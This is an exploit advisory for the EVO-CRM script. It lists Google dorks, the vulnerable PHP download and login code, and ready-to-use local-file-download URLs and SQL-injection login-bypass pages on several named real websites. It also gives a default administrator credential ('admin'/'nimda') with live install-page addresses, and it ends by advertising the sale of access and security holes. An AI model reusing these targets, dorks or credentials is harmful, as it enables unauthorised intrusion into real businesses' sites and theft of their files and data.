EVO-CRM Script Multi Vulnerability

/***********************************************************************************
** Exploit Title:   EVO-CRM Script Multi Vulnerability 
**
** Exploit Author:  Milad Hacking
**
** Vendor Homepage : http://www.operagrafica.it/
**
** Version: 1.02
**
** Google Dork  1 : intext:"Sito web realizzato da OperaGrafica"
**
** Google Dork  2 : inurl:"contatti.htm" intext:"Dopo aver preso visione"
**
** Date: 2020-03-13
**
** Tested on:  Windows/  Mozilla Firefox
**
***********************************************************************************
** Demo Vulnerability LFD :

https://www.tvmoving.it//download.php?nome_file=download.php

http://www.lacollinadelgirasole.it/download.php?nome_file=download.php

http://cafinv.eu/download.php?nome_file=download.php

https://www.frasipercaso.it/download.php?nome_file=download.php

https://www.logistics4you.express/download.php?nome_file=download.php

https://www.scattolini.it/download.php?nome_file=download.php

http://aestetika.it/download.php?nome_file=download.php

http://www.lacollinadelgirasole.it/download.php?nome_file=download.php

***********************************************************************************
***********************************************************************************
** Vulnerability Code Local File Download  :

<?php
$nome_file = $_GET['nome_file'];
$dimensione_file = filesize($nome_file); 
header("Content-type: Application/octet-stream");
header("Content-Disposition: attachment; filename=".basename($nome_file));
header("Content-Description: Download PHP");
header("Content-Length: $dimensione_file");
readfile($nome_file);
?>
***********************************************************************************
** Demo Vulnerability Bypass Login Page With Method Post To Sql Injection :

https://www.tvmoving.it//riservato/index.php

http://www.lacollinadelgirasole.it/riservato/index.php

http://cafinv.eu/riservato/index.php

https://www.frasipercaso.it/riservato/index.php

https://www.logistics4you.express/riservato/index.php

https://www.scattolini.it/riservato/index.php

http://aestetika.it/riservato/index.php

http://www.lacollinadelgirasole.it/riservato/index.php

***********************************************************************************
***********************************************************************************
** Vulnerability Code Sql Injection :

<?php
define('ACCESS', 'public');
define('RELATIVE_PATH', "../"); 
require_once(RELATIVE_PATH.'include/application_top.php');
?>
<!DOCTYPE html>
<html lang="en">
<head>
	<?php include_once("header_top.php");?>
</head>		
<body>
	<div id="caricamento" style="height:100%; top:0px;"></div>
		<div class="container-fluid">
		<div class="row-fluid">
		
			<div class="row-fluid">
				<div class="span12 center">
                	<img src="img/operagrafica.jpg" alt="<?=constant(strtoupper("GENERALI_"._NOME_SITO))?>" />
					<h2>Accesso riservato <?=constant(strtoupper("GENERALI_"._NOME_SITO))?></h2>
				</div><!--/span-->
			</div><!--/row-->
			
			<div class="row-fluid">
				<div class="well span5 center login-box">
					<div class="alert alert-info">
						Inserite un utente con credenziali valide per accedere al pannello di amministrazione.
					</div>
					<form class="form-horizontal" action="<?=_ABSOLUTE_PATH?><?=_MODULI?>utente/login.php" method="post">
						<fieldset>
							<div class="input-prepend" title="Inserisci la tua login" data-rel="tooltip_input">
								<span class="add-on"><i class="icon-user"></i></span><input autofocus class="input-medium" name="login" id="username" type="text" value="" />
							</div>
							<div class="clearfix"></div>

							<div class="input-prepend" title="Inserisci la tua password" data-rel="tooltip_input">
								<span class="add-on"><i class="icon-lock"></i></span><input class="input-medium" name="password" id="password" type="password" value="" />
							</div>
							<div class="clearfix"></div>

						<!--	<div class="input-prepend">
							<label class="remember" for="remember"><input type="checkbox" id="remember" />Remember me</label>
							</div>
							<div class="clearfix"></div> -->
							
                            <input name="loginsubmit" type="hidden" value="Invia" />
                             
							<p class="center span5">
							<button type="submit" class="btn btn-primary">Login</button>
							</p>
						</fieldset>
					</form>
				</div><!--/span-->
			</div><!--/row-->
             <div class="row-fluid">
				<div class="well span5 center">
					<p>Password dimenticata? </p>
                    <a style="margin-left:-10px;" href="richiedi_password.php" class="btn"><i class="icon-download"></i> Richiedi nuova password</a>
				</div><!--/span-->
			</div><!--/row-->
            
				</div><!--/fluid-row-->
         
         
                
		<div class="row-fluid">
				<div class="span5 center">
                <?=constant(strtoupper("GENERALI_"._NOME_SITO))?>
				</div><!--/span-->
			</div><!--/row-->
	</div><!--/.fluid-container-->

	<?php include_once("footer_js.php");?>
	
		
</body>
</html>
***********************************************************************************
** Demo Vulnerability Default Password :

http://www.lemstrumenti.it/include/install/index.php

https://www.e-volving.it/include/install/index.php

http://www.autmarconi.it/include/install/index.php

Information :     Username: admin     Password: nimda
***********************************************************************************
** Special thanks to:  Iliya Norton , Vahid Elmi , Mahsa Black , Mahdi c0c01n, Nazila Black-hat , Mahsa Black , MSAmiee , Ahawz Hackerz , AliHack051 , Ahor4
***********************************************************************************
Sell Access And Security Holes
https://fullsec.org
https://telegram.me/Milad_Hacking
Https://telegram.me/TheHackings
http://instagram.com/Milad.Hacking
milad.hacking.blackhat@Gmail.com

***********************************************************************************